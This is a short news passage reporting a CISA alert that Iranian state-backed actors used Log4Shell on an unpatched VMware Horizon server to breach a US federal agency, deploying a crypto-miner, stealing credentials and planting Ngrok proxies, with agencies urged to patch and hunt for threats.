The US authorities have urged all agencies to patch VMware systems after revealing that Iranian state-backed actors exploited the Log4Shell bug to compromise a government organization.
The alert from the Cybersecurity and Infrastructure Security Agency (CISA) claimed the unnamed Federal Civilian Executive Branch (FCEB) organization was compromised as long ago as February 2022.
An incident response engagement starting mid-June uncovered the compromise, which used the infamous Log4j bug for initial access.
“In the course of incident response activities, CISA determined that cyber-threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto-mining software, moved laterally to the domain controller (DC), compromised credentials and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” CISA said.
“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities.”
If…
